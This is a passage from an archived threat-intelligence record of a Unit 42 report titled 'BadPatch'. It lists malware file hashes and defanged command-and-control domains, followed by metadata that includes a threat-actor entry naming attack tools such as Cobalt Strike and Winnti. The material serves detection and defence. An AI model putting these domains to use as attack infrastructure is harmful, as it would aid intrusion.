f8c7d4e956dcd637f480c94f6ed49a9870375aad0eee1e651d6e7ac02\r\n5b84e8ad40e018b5d87a464e67173eebe2b268e816d9bb864f1d0f1441bebc7c\r\nf52e47c6b0916655d7e8868bd79904e8825fdf98624d8c42192cae808543b0a5\r\nc4f0ec52ce768f2ba36e4954e2afca3ef7ef46d757070a861cc6609d256a3fe1\r\n3d59703fb58265b07ae1cb26750baba733e304f5540a6824329b7ff6f7ab3efe\r\nb02585dd5399047daf3bccd9d7ed5cc69b0fc23b4709e9270c9f09f67c0a23bc\r\nd18e84f86d7a8cfd246baa1684517d69e411780f9da6b8e3ddb99a61c8d0947a\r\nc4fd31ab40e6cb2ebf75d5dc81045ebc38a8825def3f1696a539c32e5ec5b353\r\n9c6b8eb7c007abc681ceb67da5b1c7533055bb9985236abb46ec6f7e0b14e03e\r\nf1e8a5cb9c019dd649564efe4157a90a6f980fd1f0f75c596f20c02e08462373\r\n8443d7bbd02bed691ba1ce55ea0660601c5f10256cbfafd410de41ab2cd4d047\r\nade725bed78f8a8f0c9a612ee22ea716e3caeacbe16726f9726b39d74e5f3c18\r\na94e82793f458b81707e005ba1298022a6b7ca0c07869884750d121a06401689\r\n3466d46a970b77cd14cf5c6c8587f522c9b823c8b28abf87a66b07e32041e5c1\r\nd906118fb36a0cc4e83121d4d606ad685645252e8e0791f793057499d8751bf0\r\n9a8acd988089e7f9dd04f971374f766db519e854d42e8052b0d98b4c9c6b67e4\r\n122f4d69497a162a942d8f400dabbe93ae0a326a022886bf6c9c45d23c299f96\r\nce98ab10089a9ef089941e48fe4cdf1af5c8a3df358f870d933668bbfb2f330e\r\na713f5c0089a5ef9b2da40fa8cfe06aad73cc836f337c772b1c7d30d70a6c5ed\r\n7fd71102743bf9212b96368597be396a1a22a49a1ec011f1c607533bdefc94bb\r\n46f3afae22e83344e4311482a9987ed851b2de282e8127f64d5901ac945713c0\r\na7c30a18a3840a97c1ce0130b55ef3f514952233dfcc8662a9e66c6029f95ba9\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 14 of 16\n\n86ede9ee62785fb11f4c6c95937d6d5bc6bb16c0d3b90ffeeab719b59f7d4e61\r\n30282a807c2ee27b0d1dda310e41487f5018bc5fc5df8af6c13d08df34f2b6df\r\nf36048ea70f70c4adde2d93819e7aa8652ab2761e598cafb1ea871b6730dbad3\r\ncf53fc8c9ce4e5797cc5ac6f71d4cbc0f2b15f2ed43f38048a5273f40bc09876\r\n8f82649ca0e9d1d48ec58a9e2e8431ddda0dc62db1a6d2cd9ec29afa7d59abc3\r\n358b0d6fc23b4984b51deb81ce89c110582e1730bd1eb163f633e1ed9e3388ee\r\n89bb38d54a80b460ea2744b7c5af02a1823939b55990ccd31c06d7ef040d29f3\r\n4a2ef9663f0d5fdfa551e3d31af6dbcffdc78ea02c0fb963b5486daee78421bc\r\n27752bbb01abc6abf50e1da3a59fefcce59618016619d68690e71ad9d4a3c247\r\nfc7558abd0b196a2c070db98268ed00dff186d609e23a93c03640dcc478db2eb\r\n46dd5deda642d4a8cf628d865483e82279cce2846106b830d45b64e1e19727dd\r\n5c47ed83e47f1bdde8c1ebc3d6193fef190c3934fb2239e84950ae5c073eb808\r\ncc8020c36156c7e5c8cfbbb32bc8d7f03536510f4e3b38b22e0abdb9ad90c90e\r\n39b825e400ea17215d6efc5ae425759bbfd3cd8569451680fbf782cfedbec0c5\r\n050610cfb3d3100841685826273546c829335a5f4e2e4260461b88367ad9502c\r\n08b32da8995ae094bfb703d7d975c3816cf04c075c32281e51158164d76cd655\r\n24fe39572ee425e30c018947a1422342479a3d664d1a8d2ab28cef656394073a\r\n1a65e43afaaff90b4124cbef21fadc319f10fba4843d09837219400b0dbcc285\r\n087941d80baca00501739abf0b8450dce723733ea8866589fa9779481e7a6cfb\r\n285998bce9692e46652529685775aa05e3a5cb93ee4e65d021d2231256e92813\r\nc9c4263ac3287aa48d8cf03fdbb32a179cfd8c08d1c1a39696d8c932603e8df9\r\nbc8b240c89304c12dce75076f9fcc2859f48ec01347f9cc0a4cb9fbcb77ed089\r\n2349d745d84db772d97c599e6150ff4585a69d915deb6d6e6601e412651164f3\r\n2941f75da0574c21e4772f015ef38bb623dd4d0c81c263523d431b0114dd847e\r\n69424f5e0bd974271f367fae04179de4efe233d56ad81840a3c3936eaa244502\r\na793a401277b307c3b056a725672d81b71492cb564d6db2445a9c30724f61d72\r\n68ba2fa76ef3b3c905f26dae3c75a6b5e165b4246cb4f574c07ad70013b265ae\r\nb2d203b927507176606a6616ba8b8729050ecaff0790a9deb37df32caab7d613\r\n2c64a3d6b896ee1b58b9cf55531b7256de45025d60b1f4be764b385de087b52f\r\na1a5abab16c9de1c69c4a7e731c0f13c9bb8ce90dab15546807cae039c7f9385\r\nece76fdf7e33d05a757ef5ed020140d9367c7319022a889923bbfacccb58f4d7\r\n106deff16a93c4a4624fe96e3274e1432921c56d5a430834775e5b98861c00ea\r\nAppendix 2 – IOCs\r\nPal4u[.]net\r\nPal2me[.]net\r\nPay2earn[.]net\r\nShop8d[.]net\r\nTs4shope[.]net\r\npal4news[.]net\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 15 of 16\n\nads4market[.]net\r\nwp.piedslibres[.]com (hijacked legitimate site)\r\nSource: https://unit42.paloaltonetworks.com/unit42-badpatch/\r\nhttps://unit42.paloaltonetworks.com/unit42-badpatch/\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-badpatch/"
	],
	"report_names": [
		"unit42-badpatch"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439054,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/236ea5241550bfc164e1d4a70df418046bcb5dc9.pdf",
		"text": "https://archive.orkl.eu/236ea5241550bfc164e1d4a70df418046bcb5dc9.txt",
		"img": "https://archive.orkl.eu/236ea5241550bfc164e1d4a70df418046bcb5dc9.jpg"
	}
}